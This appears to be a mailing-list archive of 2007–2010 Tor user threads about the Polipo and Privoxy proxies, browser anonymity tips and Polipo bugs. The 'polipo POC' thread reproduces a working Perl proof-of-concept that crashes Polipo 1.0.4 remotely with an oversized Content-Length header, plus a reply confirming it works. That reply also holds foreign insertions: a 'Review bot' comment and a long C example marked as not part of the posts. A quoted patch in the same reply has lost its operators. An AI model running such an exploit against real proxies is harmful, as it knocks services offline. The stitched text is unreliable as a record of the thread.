 at the Students for Free Culture conference in DC - and the general
 conclusion is that Tor/FF is too hard to use and set up  (and I think
 that this has been the conclusion from the folks at the
 OpenNetInitiative at Harvard about the real-world usage of censorship
 resisting tools in Iran and such) and that most people end up using
 the first result on whatever search engine for get around blocked
 internet, etc, which ends up using a webproxy.

This is why the Tor Browser Bundle exists,
http://www.torproject.org/torbrowser/.  It's self-contained and
pre-configured. Just download, extract, and run.  There's no
configuration needed.

-- 
Andrew Lewman
The Tor Project
pgp 0x31B0974B

Website: https://torproject.org/
Blog: https://blog.torproject.org/
Identi.ca: torproject


Re: why polipo?

2010-02-20 Thread Rich Jones
Egg -- My face

Well done, guys.
R



Re: why polipo?

2010-02-19 Thread Andrew Lewman
On 02/15/2010 12:09 PM, Michael Gomboc wrote:
 Why is polipo used and no longer privoxy?

The first question is, why a http proxy at all?

The answer is, because Firefox SOCKS layer has hard-coded timeouts, and
other issues, https://bugzilla.mozilla.org/show_bug.cgi?id=280661.
Personally, I don't use an http proxy, I simply let my browser talk to
tor via socks directly.  The user experience sucks, because you'll
receive untold numbers of "The connection has timed out" warnings,
because firefox won't wait for Tor to build a circuit.  Chrome, Safari,
and Arora (amongst others) don't have this problem.

Once Firefox fixes bug 280661, we don't need a http proxy at all.
However, given the current pace of progress on 280661, we may switch to
Chrome before the fix occurs.

The second question is, why switch from privoxy to polipo?

Privoxy is fine filtering software that works well for what it is
intended to do.  However, its user experience is lacking due to it
lacking a few features, namely, http 1.1 pipelining, caching most
requested objects, and it needs to see the entire page to parse it,
before sending it on to the browser.  Lack of these three features is
the reason we switched from privoxy to polipo.

We've received plenty of feedback that browsing with polipo in place of
privoxy feels faster.  The feedback indicates that because polipo
streams the content to the browser for rendering nearly as fast as it
receives it from Tor, the user understands what's going on and will
start to read the web page as it loads.  Privoxy, necessarily, will load
the entire page, parse it for items to be filtered, and then send the
page on to the browser.  The user experience, especially on a slow
circuit, is that nothing happens, the browser activity icon spins
forever, and suddenly a page appears many, many seconds later.

If Tor was vastly faster, privoxy's mode of operation wouldn't matter.
We're working on making Tor faster.  However, purposely showing the user
how slow tor can be with privoxy was a huge point of complaint, and not
what we intended to do.

Does polipo have some bugs?  Sure.  Chrisd primarily, among others, is
working on fixing them.  At the current rate of progress on firefox bug
280661, we'll have polipo fixed before mozilla releases the SOCKS layer
fix.  Chrisd even wrote Mozilla a patch and submitted it on the bug.

The final point is that this is all free software.  You are in control.
 If you don't like polipo, but do like privoxy, then don't install
polipo and use privoxy.

The power of choice is yours.

-- 
Andrew Lewman
The Tor Project
pgp 0x31B0974B

Website: https://torproject.org/
Blog: https://blog.torproject.org/
Identi.ca: torproject


polipo problems

2010-01-03 Thread M

Hi,

As polipo has now replaced privoxy in the default tor setup I am trying 
to use it, but it doesn't work.


Could someone please help me do these 2 things:


1. Run polipo as a windows 2003 service.

Every time I try to start polipo as a service it crashes. I tried to set 
daemonise=true in the config, but this doesn't help (I have searched the 
web and the polipo manual, I found no other info on how to do this). 
Privoxy works fine as a service, why is polipo such a headache?



2. Add this proxy functionality I have with privoxy to the polipo config:

--
#this directs ALL requests to the tor proxy
forward-socks4a / localhost:9050 .

#this forwards all requests to I2P domains to the local I2P
#proxy without dns requests
forward .i2p localhost:

#this forwards all requests to Freenet domains to the local Freenet node
#proxy without dns requests
forward ksk@ localhost:
forward ssk@ localhost:
forward chk@ localhost:
forward svk@ localhost:
-

(I see the tor socks is already set in the polipo config)


If someone can help me out with this I could finally move everything to 
polipo.


Thanks.





Privoxy and Polipo

2009-12-27 Thread arshad
hi all,
what is the difference in using privoxy and polipo?
im in ubuntu and have used both. and privoxy seems unable to render
all .gifs file. it shows part of the gif or in some cases won't show the
animation.

why is this?

thank you very much



Re: Privoxy and Polipo

2009-12-27 Thread Jim



arshad wrote:

hi all,
what is the difference in using privoxy and polipo?
im in ubuntu and have used both. and privoxy seems unable to render
all .gifs file. it shows part of the gif or in some cases won't show the
animation.


Privoxy has the ability to deanimate gifs.  Check your Privoxy 
configuration.


The "Look up which actions apply to a URL and why" link in Privoxy's web 
interface may be useful to you.


Cheers,
Jim




Re: Privoxy and Polipo

2009-12-27 Thread arshad
On Sun, 2009-12-27 at 04:50 -0700, Jim wrote:
 
 arshad wrote:
  hi all,
  what is the difference in using privoxy and polipo?
  im in ubuntu and have used both. and privoxy seems unable to render
  all .gifs file. it shows part of the gif or in some cases won't show the
  animation.
 
 Privoxy has the ability to deanimate gifs.  Check your Privoxy 
 configuration.
 
 The Look up which actions apply to a URL and why link in Privoxy's web 
 interface may be useful to you.
 
 Cheers,
 Jim
 
 

thanks for the reply. i looked at links.
will you be kind enough to brief how to resolve the problem please?
thank you.



Re: Privoxy and Polipo

2009-12-27 Thread arshad
On Sun, 2009-12-27 at 04:50 -0700, Jim wrote:
 
 arshad wrote:
  hi all,
  what is the difference in using privoxy and polipo?
  im in ubuntu and have used both. and privoxy seems unable to render
  all .gifs file. it shows part of the gif or in some cases won't show the
  animation.
 
 Privoxy has the ability to deanimate gifs.  Check your Privoxy 
 configuration.
 
 The Look up which actions apply to a URL and why link in Privoxy's web 
 interface may be useful to you.
 
 Cheers,
 Jim
 
 

thanks. now figured out a little.
at first i went to that page without privoxy and didnt get the point.
after going through proxy i figured it out a little.
but now i want to disable that deanimate gif thing. but there isn't a
place in config file to do that :(

thank you very much



Re: Privoxy and Polipo

2009-12-27 Thread Gitano
arshad wrote:

 but now i want to disable that deanimate gif thing. but there isn't a
 place in config file to do that :(

The place for personal configuration in privoxy is 'user.action'.
You can append these two lines:

{-deanimate-gifs}
/ # Match all URLs



Re: Privoxy and Polipo

2009-12-27 Thread arshad
On Sun, 2009-12-27 at 14:06 +0100, Gitano wrote:
 arshad wrote:
 
  but now i want to disable that deanimate gif thing. but there isn't a
  place in config file to do that :(
 
 The place for personal configuration in privoxy is 'user.action'.
 You can append these two lines:
 
 {-deanimate-gifs}
 / # Match all URLs
 

thank you for this.
i did this. and hopefully will check what happens upon rebooting the
pc. as for now it seems not working.



Re: polipo POC

2009-12-09 Thread Jacob Appelbaum
Darren Thurston wrote:
 
 #!/usr/bin/perl
 # estranged.pl
 # AKA
 # Polipo 1.0.4 Remote Memory Corruption 0day PoC

Cute.

 $payload = "GET / HTTP/1.1\r\nContent-Length: 2147483602\r\n\r\n";
 

The proof of concept works as advertised. Wheee.

Here's a simple patch (that probably breaks some requests and is
imperfect) to stop the proof of concept while we wait on upstream to
provide a real fix for it:

--- polipo-1.0.4/client.c   2008-01-08 14:56:45.0 +0200
+++ polipo-1.0.4-fixed/client.c 2009-12-09 15:30:53.0 +0200
@@ -998,7 +998,7 @@
 return 1;
 }

-if(connection-reqlen  connection-reqbegin) {
+if(connection-reqlen  connection-reqbegin  (connection-reqlen
- connection-reqbegin )  0 ) {
 memmove(connection-reqbuf, connection-reqbuf +
connection-reqbegin,
 connection-reqlen - connection-reqbegin);
 connection-reqlen -= connection-reqbegin;
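
Review bot: The difference test added to the changed if line only rejects the PoC's state when the subtraction itself overflows and wraps, and, assuming reqlen and reqbegin are plain signed ints (the negative register values in the posted gdb output suggest so), that overflow is undefined behaviour in C; a compiler may also drop the new term because the first term already establishes that reqlen is larger than reqbegin. Validate the offsets directly instead: require reqbegin to be non-negative and no greater than reqlen (and reqlen to fit the buffer) before the memmove, and treat a failure as a protocol error that closes the connection rather than falling through to the reset branch. The oversized Content-Length should also be rejected where it is parsed, so that an out-of-range offset is never stored in the first place.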

Using memmove like that is extremely unsafe. :-(

Best,
Jacob
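
The arithmetic behind the crash and a bounds-checked compaction, as an added example that is not Polipo's code and not part of either post. It assumes reqbegin is a 32-bit signed offset advanced by the 46 header bytes of the posted request plus its Content-Length, which the page does not show; `struct conn`, `REQBUF_SIZE` and the function names are hypothetical.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define REQBUF_SIZE 4096            /* assumed buffer size for this sketch */

/* Hypothetical stand-in for the three fields the quoted client.c lines use. */
struct conn {
    char reqbuf[REQBUF_SIZE];
    int  reqlen;                    /* bytes currently held in reqbuf */
    int  reqbegin;                  /* offset of the first unconsumed byte */
};

/* Value a 32-bit signed offset ends up holding after base + add, computed
 * with unsigned arithmetic so this sketch has no undefined behaviour. */
static int64_t wrapped_offset(int32_t base, int64_t add)
{
    uint32_t u = (uint32_t)base + (uint32_t)add;
    return u >= 0x80000000u ? (int64_t)u - 4294967296LL : (int64_t)u;
}

/* Byte count the original test (reqlen > reqbegin) would hand to memmove,
 * or -1 when the else branch (reset) would run. 64-bit math, no overflow. */
static int64_t unchecked_copy_len(int reqlen, int reqbegin)
{
    if (reqlen > reqbegin)
        return (int64_t)reqlen - (int64_t)reqbegin;
    return -1;
}

/* Hardened compaction: both offsets are validated against the buffer before
 * any pointer arithmetic. Returns bytes kept, or -1 after resetting state. */
static int compact_checked(struct conn *c)
{
    if (c->reqlen < 0 || c->reqlen > REQBUF_SIZE ||
        c->reqbegin < 0 || c->reqbegin > c->reqlen) {
        c->reqlen = 0;
        c->reqbegin = 0;
        return -1;                  /* caller should drop the connection */
    }
    size_t keep = (size_t)(c->reqlen - c->reqbegin);
    if (keep > 0)
        memmove(c->reqbuf, c->reqbuf + c->reqbegin, keep);
    c->reqlen = (int)keep;
    c->reqbegin = 0;
    return (int)keep;
}

/* Constructed hostile state: 46 header bytes buffered (the length of the
 * posted request), offset wrapped by the posted Content-Length. */
static int demo_hostile(void)
{
    static struct conn c;
    c.reqlen = 46;
    c.reqbegin = (int)wrapped_offset(46, 2147483602LL);
    return compact_checked(&c);
}

/* Constructed normal state: 4 consumed bytes, 4 pipelined bytes to keep. */
static int demo_normal(void)
{
    static struct conn c;
    memcpy(c.reqbuf, "AAAABBBB", 8);
    c.reqlen = 8;
    c.reqbegin = 4;
    int kept = compact_checked(&c);
    return kept == 4 && c.reqlen == 4 && c.reqbegin == 0 &&
           memcmp(c.reqbuf, "BBBB", 4) == 0;
}

int main(void)
{
    printf("wrapped offset : %lld\n",
           (long long)wrapped_offset(46, 2147483602LL));
    printf("unchecked count: %lld\n",
           (long long)unchecked_copy_len(46, INT32_MIN));
    printf("hostile state  : %d\n", demo_hostile());
    printf("normal state ok: %d\n", demo_normal());
    return 0;
}
```

Under that assumption the wrapped offset is -2147483648, the same value the posted gdb output shows for eax, and the unchecked condition would request a copy far larger than the buffer.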





polipo POC

2009-12-08 Thread Darren Thurston


#!/usr/bin/perl
# estranged.pl
# AKA
# Polipo 1.0.4 Remote Memory Corruption 0day PoC
#
# Jeremy Brown [0xjbrow...@gmail.com//jbrownsec.blogspot.com//krakowlabs.com] 12.07.2009
#
# *
#
# Hzzp loves you Polipo!
#
# No use reporting this issue to Ubuntu Security unless you feel like waiting
# two weeks for them to sit on
# it, then UNFLAG security issue and call it a feature.
#
# I informally request that they apologize to the developers themselves x)
#
# polipo-20080907/client.c [1001-1009]:
#
# if(connection->reqlen > connection->reqbegin) {
#     memmove(connection->reqbuf, connection->reqbuf + connection->reqbegin,
#             connection->reqlen - connection->reqbegin);
#     connection->reqlen -= connection->reqbegin;
#     connection->reqbegin = 0;
# } else {
#     connection->reqlen = 0;
#     connection->reqbegin = 0;
# }
#
# 0.9.8 / 1.0.4 tested vulnerable
#
# Program received signal SIGSEGV, Segmentation fault.
# 0x40093486 in memmove () from /lib/libc.so.6
# (gdb) i r
# eax0x8000 -2147483648
# ecx0x22
# edx0x802c -2147483604
# ebx0x80775d8  134706648
# esp0xb7f0 0xb7f0
# ebp0xb7f8 0xb7f8
# esi0x4017002d 1075249197
# edi0xc017002d -1072234451
# eip0x40093486 0x40093486
# eflags 0x1068667206
# cs 0x23   35
# ss 0x2b   43
# ds 0x2b   43
# es 0x2b   43
# fs 0x00
# gs 0x00
# (gdb) bt
#0  0x40093486 in memmove () from /lib/libc.so.6
#1  0x0805a594 in ?? ()
#2  0x4017 in ?? ()
#3  0xc017 in ?? ()
#4  0x802e in ?? ()
#5  0x0804e744 in ?? ()
#6  0x08077548 in ?? ()
#7  0x08077550 in ?? ()
#8  0x0001 in ?? ()
#9  0x000a in ?? ()
#10 0x0001 in ?? ()
#11 0x080775d8 in ?? ()
#12 0xb908 in ?? ()
#13 0x0805a458 in ?? ()
#14 0x08077498 in ?? ()
#15 0x0001 in ?? ()
#16 0x0001 in ?? ()
#17 0x0001 in ?? ()
#18 0x0001 in ?? ()
#19 0x0805eb8d in ?? ()
#20 0x in ?? ()
#21 0xb8d0 in ?? ()
#22 0xb8ac in ?? ()
#23 0xb8b0 in ?? ()
#24 0x in ?? ()
#25 0x in ?? ()
#26 0x in ?? ()
#27 0x in ?? ()
#28 0x in ?? ()
#29 0x in ?? ()
#30 0x in ?? ()
#31 0x in ?? ()
#32 0xb8b4 in ?? ()
#33 0xb8c0 in ?? ()
#34 0x in ?? ()
#35 0x in ?? ()
#36 0xb8b8 in ?? ()
#37 0xb8bc in ?? ()
#38 0x40170003 in ?? ()
#39 0x0806f803 in _IO_stdin_used ()
#40 0x08077550 in ?? ()
#41 0x4008dc91 in mallopt () from /lib/libc.so.6
# Previous frame inner to this frame (corrupt stack?)
# (gdb)
#
#(gdb) x/i $eip
#0x40093486 memmove+102:  repz movsb %ds:(%esi),%es:(%edi)
#
# And my hair cannot commit, to one popular genre of music
#
# *
# estranged.pl

use IO::Socket;

$target = $ARGV[0];
$port   = 8123;

$payload = "GET / HTTP/1.1\r\nContent-Length: 2147483602\r\n\r\n";

$sock = IO::Socket::INET->new(Proto=>'tcp', PeerHost=>$target, PeerPort=>$port)
or die "Error: $target:$port\n";
$sock->send($payload);

close($sock);



Re: Increasing Polipo Portability for GSoC 2009

2009-05-06 Thread Christopher Davis
On Tue, May 05, 2009 at 08:37:28AM -0700, Wesley Kenzie wrote:
 Hi, Christopher. If you could also solve the known instability issues with
 polipo that Juliusz has not had time to resolve in the past year, then many
 would be grateful.  I cannot get polipo to run for more than about an hour
 without it crashing.
 . . . . .
 Wesley
 

I should be able to take a look at this if there's time.  

-- 
Christopher Davis
Mangrin Remailer Admin
PGP: 0x0F8DA163


Increasing Polipo Portability for GSoC 2009

2009-05-05 Thread Christopher Davis
Hello,

I'll be working to increase Polipo's portability for GSoC 2009,
which starts a bit later this month. I'm happy to have Nick Mathewson
of the Tor project as my mentor, and I'll also be working with 
Juliusz Chroboczek, author of Polipo, to hopefully get some of the
changes committed.

The main idea of the project centers on libevent integration. A number
of other prominent projects use the library, including Tor, and so there
are more avenues for bug fixes. To start with, integration will be basic,
but it will be enough to take advantage of platform-specific interfaces
for polling large numbers of file descriptors, as well as libevent's
portable asynchronous DNS resolver.

Another part of the project is to add a simple controller application
(which will typically be run in the system tray). This is mainly to
enable Windows users to signal Polipo at run-time.

There are some smaller bits I'd like to tackle, as well, including
adding a Windows installer and autotools support for automatically
finding dependencies.

I'm looking forward to the summer.

Thanks,
--
Christopher Davis
Mangrin Remailer Admin
PGP: 0x0F8DA163



Re: Increasing Polipo Portability for GSoC 2009

2009-05-05 Thread Wesley Kenzie
Hi, Christopher. If you could also solve the known instability issues with
polipo that Juliusz has not had time to resolve in the past year, then many
would be grateful.  I cannot get polipo to run for more than about an hour
without it crashing.
. . . . .
Wesley






Re: Increasing Polipo Portability for GSoC 2009

2009-05-05 Thread Kyle Williams
On Tue, May 5, 2009 at 12:10 AM, Christopher Davis chr...@mangrin.org wrote:

 Hello,

 I'll be working to increase Polipo's portability for GSoC 2009,
 which starts a bit later this month. I'm happy to have Nick Mathewson
 of the Tor project as my mentor, and I'll also be working with
 Juliusz Chroboczek, author of Polipo, to hopefully get some of the
 changes committed.


I thought Polipo was already portable.  I've been using it with D.A.D. on a
USB drive for over a year, and haven't had any problems.




 The main idea of the project centers on libevent integration. A number
 of other prominent projects use the library, including Tor, and so there
 are more avenues for bug fixes. To start with, integration will be basic,
 but it will be enough to take advantage of platform-specific interfaces
 for polling large numbers of file descriptors, as well as libevent's
 portable asynchronous DNS resolver.


Cool.



 Another part of the project is to add a simple controller application
 (which will typically be run in the system tray). This is mainly to
 enable Windows users to signal Polipo at run-time.


That would be nice.  As I use it right now, it's quietly running in the
background.



 There are some smaller bits I'd like to tackle, as well, including
 adding a Windows installer and autotools support for automatically
 finding dependencies.

 I'm looking forward to the summer.


Looking forward to your results.


- Kyle


Re: Increasing Polipo Portability for GSoC 2009

2009-05-05 Thread Roger Dingledine
On Tue, May 05, 2009 at 04:16:07PM -0700, Kyle Williams wrote:
  I'll be working to increase Polipo's portability for GSoC 2009,
 
 I thought Polipo was already portable.  I've been using it with D.A.D. on a
 USB drive for over a year, and haven't had any problems.

In software development lingo, portability has to do with whether a
program compiles and runs on a variety of architectures and operating
systems.

It's a different term than the collection of portable foo programs
that aim to be run without needing system libraries/etc.

--Roger



polipo - choosing an exit

2008-08-13 Thread Dawney Smith
Hi,

I'm using polipo. When I choose an exit node by sticking node.exit on
the end of a url, I think that is actually passed on with the Host
header. How do I get polipo to strip that off?

For example, "http://www.showmyip.com.tortila.exit/" doesn't work as it
has no vhost set up for www.showmyip.com.tortila.exit.

Also, if the html returned by that page contained eg:

<img src="http://www.showmyip.com/foo.jpg" /> am I correct in thinking
that that request wouldn't necessarily go out via the same exit node I
chose for the main page?

-- 
Dawn


Annoying polipo problem on linux

2008-01-16 Thread kazaam
Hi,
I'm trying to switch from privoxy to polipo. But polipo seems to have an 
annoying problem. Polipo gets started as a service while booting, the same as I 
did with privoxy. But tor gets just started with activating Vidalia. 
The problem is if tor is not running when polipo gets started it doesn't use 
it! I mean if I start Vidalia+Tor and Polipo has been started before Polipo 
doesn't use Tor. But I can't start tor before polipo because I wanna use it 
with Vidalia. So I have every boot to manually start polipo with sudo 
/etc/init.d/polipo start. Has anyone a workaround for this?

greets


Re: Browser dos/don'ts ( was Re: Incognito Live CD using Polipo)

2007-10-18 Thread Juliusz Chroboczek
 :  a bobnjoe browser

 : For the crass foreigners among us -- what does this idiom mean?

 Bob & Joe's Bait, Tackle, and Web Browsers [...] Sorry for the confusion.

Quite the opposite -- thanks to you for the snippet of local colour.

Juliusz


Re: Browser dos/don'ts ( was Re: Incognito Live CD using Polipo)

2007-10-17 Thread phobos
On Thu, Oct 18, 2007 at 12:54:30AM +0200, [EMAIL PROTECTED] wrote 0.1K bytes in 
5 lines about:
:  a bobnjoe browser
: 
: For the crass foreigners among us -- what does this idiom mean?

It's a phobosism as a result of growing up in a rural area.  I meant it
as a very small population of users.  Such as if Bob & Joe's Bait,
Tackle, and Web Browsers was a real store serving a small portion of the
local area.  This means users of BobnJoe's browser would stand out in a
crowd.  Sorry for the confusion.

-- 
Andrew


Re: Incognito Live CD using Polipo

2007-10-15 Thread Pat Double
On Tuesday 09 October 2007, Juliusz Chroboczek wrote:
  It's fairly easy to convert the adblock plus 'easylist' into a polipo
  forbidden file.

 Do you have a script you'd be willing to share?  I'd be glad to link
 to it from the Polipo page.

 Juliusz

Here's one:
https://tor-svn.freehaven.net/svn/incognito/trunk/adblockplusfilter2polipo.sh

Patches welcome.

-- 
Pat Double, [EMAIL PROTECTED]
Ye must be born again. - John 3:7




Re: Browser dos/don'ts ( was Re: Incognito Live CD using Polipo)

2007-10-15 Thread Robert Hogan
On Sunday 14 October 2007 19:50:38 [EMAIL PROTECTED] wrote:
 On Sat, Oct 13, 2007 at 09:21:40AM +0100, [EMAIL PROTECTED] wrote 0.9K 
bytes in 30 lines about:
 : Do:
 : Spoof user-agent (is this necessary even with javascript disabled?)
 : (browser)

 Arguably, unless you're using BobnJoe's browser, any of the popular ones
 should provide sufficient numbers (firefox, safari, opera, ie).

konqueror, a bobnjoe browser if ever there was one, can only turn off sending 
the user-agent and spoof it for selected websites. it doesn't even support 
regexes.

 : Spoof http-headers as though a US english browser (browser/privacy
 : proxy?)

 Only if you want to appear as coming from the US, and if you read
 English.  If you're in UAE and spoofing US English, then you may stand
 out for being different.


But no-one should know you're in the UAE because you're using tor. Or have I 
missed your point?

 : Do not:
 : Use tabs (enforced/recommended by controller?)

 Why?

 : Keep the browser open when finished 'using tor' (enforced/recommended by
 : controller?)

 If your browser properly cleans up and you've disabled everything,
 chances are this isn't that big of a deal.

for both, javascript timers apparently. a separate browser or open-and-close 
browser session seems to be the thing.




Re: Browser dos/don'ts ( was Re: Incognito Live CD using Polipo)

2007-10-15 Thread Kasimir Gabert
People will know that you are in the UAE if you are browsing websites
that are only for people and used by people in the UAE.

Kasimir Gabert

On 10/15/07, Robert Hogan [EMAIL PROTECTED] wrote:
 On Sunday 14 October 2007 19:50:38 [EMAIL PROTECTED] wrote:
  On Sat, Oct 13, 2007 at 09:21:40AM +0100, [EMAIL PROTECTED] wrote 0.9K
 bytes in 30 lines about:
  : Do:
  : Spoof user-agent (is this necessary even with javascript disabled?)
  : (browser)
 
  Arguably, unless you're using BobnJoe's browser, any of the popular ones
  should provide sufficient numbers (firefox, safari, opera, ie).
 
 konqueror, a bobnjoe browser if ever there was one, can only turn off sending
 the user-agent and spoof it for selected websites. it doesn't even support
 regexes.

  : Spoof http-headers as though a US english browser (browser/privacy
  : proxy?)
 
  Only if you want to appear as coming from the US, and if you read
  English.  If you're in UAE and spoofing US English, then you may stand
  out for being different.
 

 But no-one should know you're in the UAE because you're using tor. Or have I
 missed your point?

  : Do not:
  : Use tabs (enforced/recommended by controller?)
 
  Why?
 
  : Keep the browser open when finished 'using tor' (enforced/recommended by
  : controller?)
 
  If your browser properly cleans up and you've disabled everything,
  chances are this isn't that big of a deal.

 for both, javascript timers apparently. a separate browser or open-and-close
 browser session seems to be the thing.




-- 
Kasimir Gabert


Re: Browser dos/don'ts ( was Re: Incognito Live CD using Polipo)

2007-10-15 Thread Kasimir Gabert
 On 10/15/07, Robert Hogan [EMAIL PROTECTED] wrote:
  On Sunday 14 October 2007 19:50:38 [EMAIL PROTECTED] wrote:
   On Sat, Oct 13, 2007 at 09:21:40AM +0100, [EMAIL PROTECTED] wrote 0.9K
  bytes in 30 lines about:
   : Do:
   : Spoof user-agent (is this necessary even with javascript disabled?)
   : (browser)
  
   Arguably, unless you're using BobnJoe's browser, any of the popular ones
   should provide sufficient numbers (firefox, safari, opera, ie).
  
  konqueror, a bobnjoe browser if ever there was one, can only turn off 
  sending
  the user-agent and spoof it for selected websites. it doesn't even support
  regexes.
 
   : Spoof http-headers as though a US english browser (browser/privacy
   : proxy?)
  
   Only if you want to appear as coming from the US, and if you read
   English.  If you're in UAE and spoofing US English, then you may stand
   out for being different.
  
 
  But no-one should know you're in the UAE because you're using tor. Or have I
  missed your point?
 
   : Do not:
   : Use tabs (enforced/recommended by controller?)
  
   Why?
  
   : Keep the browser open when finished 'using tor' (enforced/recommended by
   : controller?)
  
   If your browser properly cleans up and you've disabled everything,
   chances are this isn't that big of a deal.
 
  for both, javascript timers apparently. a separate browser or open-and-close
  browser session seems to be the thing.
 
 
 On 10/15/07, Kasimir Gabert [EMAIL PROTECTED] wrote:
 People will know that you are in the UAE if you are browsing websites
 that are only for people and used by people in the UAE.

 Kasimir Gabert



Unfortunately, I top posted!  I am sorry, this is where my message
should end up.  Reason:  Too hasty typing with GMail at a library.

My most earnest apologies.


-- 
Kasimir Gabert


Re: Browser dos/don'ts ( was Re: Incognito Live CD using Polipo)

2007-10-14 Thread phobos
On Sat, Oct 13, 2007 at 09:21:40AM +0100, [EMAIL PROTECTED] wrote 0.9K bytes in 
30 lines about:
: Do:
: Spoof user-agent (is this necessary even with javascript disabled?) (browser)

Arguably, unless you're using BobnJoe's browser, any of the popular ones
should provide sufficient numbers (firefox, safari, opera, ie).

: Spoof http-headers as though a US english browser (browser/privacy proxy?)

Only if you want to appear as coming from the US, and if you read
English.  If you're in UAE and spoofing US English, then you may stand
out for being different.

: Do not:
: Use tabs (enforced/recommended by controller?)

Why?

: Keep the browser open when finished 'using tor' (enforced/recommended by 
: controller?)

If your browser properly cleans up and you've disabled everything,
chances are this isn't that big of a deal.

-- 
Andrew


Browser dos/don'ts ( was Re: Incognito Live CD using Polipo)

2007-10-13 Thread Robert Hogan
On Friday 12 October 2007 00:26:46 [EMAIL PROTECTED] wrote:
 On Thu, Oct 11, 2007 at 08:57:48PM +0100, [EMAIL PROTECTED] wrote 1.1K 
bytes in 29 lines about:
 : Keeping track of all the things you should turn off or get a proxy to
 : tweak makes my feeble head hurt.

 The latest torbutton-dev releases handle most of this for you.

So for any browser without torbutton the list of things to do while using tor 
is:

Turn off:
Javascript (browser)
Java (browser)
Plugins (browser)
Cookies (browser)
Referer Headers (privacy proxy)
Caching (browser)
History reads/writes (browser)

Do:
Spoof user-agent (is this necessary even with javascript disabled?) (browser)
Spoof http-headers as though a US english browser (browser/privacy proxy?)

Do not:
Use tabs (enforced/recommended by controller?)
Keep the browser open when finished 'using tor' (enforced/recommended by 
controller?)

Anything to add/remove/clarify?



Re: Browser dos/don'ts ( was Re: Incognito Live CD using Polipo)

2007-10-13 Thread TOR Admin (gpfTOR1)
Robert Hogan wrote:
 Do:
 Spoof user-agent (is this necessary even with javascript disabled?) (browser)

I think, it is necessary. Do this job in browser, because no proxy can
do it for SSL-encrypted stuff. And change the fake time by time.

You may try showmyip with and without javascript. In both cases you see
the user agent:

http://www.showmyip.com/?version=full


Re: Browser dos/don'ts ( was Re: Incognito Live CD using Polipo)

2007-10-13 Thread Ben Wilhelm



TOR Admin (gpfTOR1) wrote:
 Robert Hogan wrote:
  Do:
  Spoof user-agent (is this necessary even with javascript disabled?) (browser)

 I think, it is necessary. Do this job in browser, because no proxy can
 do it for SSL-encrypted stuff. And change the fake time by time.


I disagree. Don't do anything that makes you stand out. That includes 
changing to a multitude of fake user-agents.


Pick the most common user-agent and use it. That's probably whatever the 
latest version of Firefox returns. (I'm assuming Tor traffic is 
firefox-heavy - I may be wrong on this. IE6 or IE7 may be a better 
choice. Remember, they can tell you're probably coming from Tor, so you 
want to blend in with average Tor traffic.) Then only change it if the 
most popular browser changes.


That way you blend in with the herd. It's easy to track the guy who's 
using Bob's Krazy Web Browzur one day, and xXxDeAtHxXx the next day, and 
lol ive got a new useragent today after that. It's not so easy to 
track one guy out of ten thousand using Firefox.


-Ben


Re: Browser dos/don'ts ( was Re: Incognito Live CD using Polipo)

2007-10-13 Thread TOR Admin (gpfTOR1)
Ben Wilhelm wrote:
 Pick the most common user-agent and use it. That's probably whatever the
 latest version of Firefox returns. 

Ok, I use (only a few examples):

Mozilla/5.0 (Macintosh; U; PPC Mac OS X; sk-SK; rv:1.8.1.6)
Gecko/20070824 Firefox/2.0.0.6

Mozilla/5.0 (X11; U; Linux i586; de-DE; rv:1.8.1.6) Gecko/20070920
Firefox/2.0.0.6

Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.8.1.6) Gecko/20070901
Firefox/2.0.0.6

Mozilla/5.0 (X11; U; Linux i686; de-CH; rv:1.8.1.6) Gecko/20070917
Firefox/2.0.0.6

Mozilla/5.0 (X11; U; FreeBSD i386; de-DE; rv:1.8.1.6) Gecko/20070807
Firefox/2.0.0.6

Mozilla/5.0 (X11; U; FreeBSD amd64; en-US; rv:1.8.1.6) Gecko/20070927
Firefox/2.0.0.6

Mozilla/5.0 (X11; U; SunOS i86pc; en-AU; rv:1.8.1.6) Gecko/20070926
Firefox/2.0.0.6

All user-agents are Firefox. Some are not very common, maybe. A
user-agent is more than the Firefox/2.0.0.6

I use the tool uagen written by F. Keil.


Re: Incognito Live CD using Polipo

2007-10-11 Thread Pat Double
On Thursday 11 October 2007, Robert Hogan wrote:
 On Wednesday 10 October 2007 13:20:31 Pat Double wrote:
  On Tuesday 09 October 2007, Juliusz Chroboczek wrote:
  You should use RefControl 
  https://addons.mozilla.org/en-US/firefox/addon/953  to spoof
  referrers headers, not Polipo, as RefControl does HTTPS and HTTP.
  
   Yep.  In all cases, doing things in the browser is better than doing
   them in the proxy.
  
   However, I understand that Pat is trying to be at least somewhat
   browser-agnostic.
 
  I'm not sure my goal of providing more than Firefox as a web browser is a
  good idea. It is known that Tor is not enough to make you anonymous,
  hence all these extensions that are installed in Firefox. The problem is
  that not all of the same features are available on Konqueror or links. I
  can't remove Konqueror since it also does file management, but I think
  links I should remove. And the desktop link to Konq may need to be
  removed as well.

 Keeping track of all the things you should turn off or get a proxy to tweak
 makes my feeble head hurt.

 Turn off:
 Plugins, Java, Javascript, ads

 Tweak:
 Referrers

 Um, what else? I'm confused. We need a list.

No kidding :) I did find Konqueror has the features that are needed (I think, 
we need a list.) I should do more research before sending email, but TorK 
indeed disables the necessary things and Konqueror supports AdBlock filters 
so I added the same filter for FireFox AdBlock Plus to Konqueror. I kept 
links, as anonym made a good point: the only users running links most likely 
know what they are doing.

-- 
Pat Double, [EMAIL PROTECTED]
Ye must be born again. - John 3:7




Re: Incognito Live CD using Polipo

2007-10-11 Thread phobos
On Thu, Oct 11, 2007 at 08:57:48PM +0100, [EMAIL PROTECTED] wrote 1.1K bytes in 
29 lines about:
: Keeping track of all the things you should turn off or get a proxy to tweak 
: makes my feeble head hurt.

The latest torbutton-dev releases handle most of this for you.

-- 
Andrew


Re: Incognito Live CD using Polipo

2007-10-10 Thread Pat Double
On Tuesday 09 October 2007, Juliusz Chroboczek wrote:
You should use RefControl 
https://addons.mozilla.org/en-US/firefox/addon/953  to spoof
referrers headers, not Polipo, as RefControl does HTTPS and HTTP.

 Yep.  In all cases, doing things in the browser is better than doing
 them in the proxy.

 However, I understand that Pat is trying to be at least somewhat
 browser-agnostic.

I'm not sure my goal of providing more than Firefox as a web browser is a good 
idea. It is known that Tor is not enough to make you anonymous, hence all 
these extensions that are installed in Firefox. The problem is that not all 
of the same features are available on Konqueror or links. I can't remove 
Konqueror since it also does file management, but I think links I should 
remove. And the desktop link to Konq may need to be removed as well.


-- 
Pat Double, [EMAIL PROTECTED]
Ye must be born again. - John 3:7




Re: Incognito Live CD using Polipo

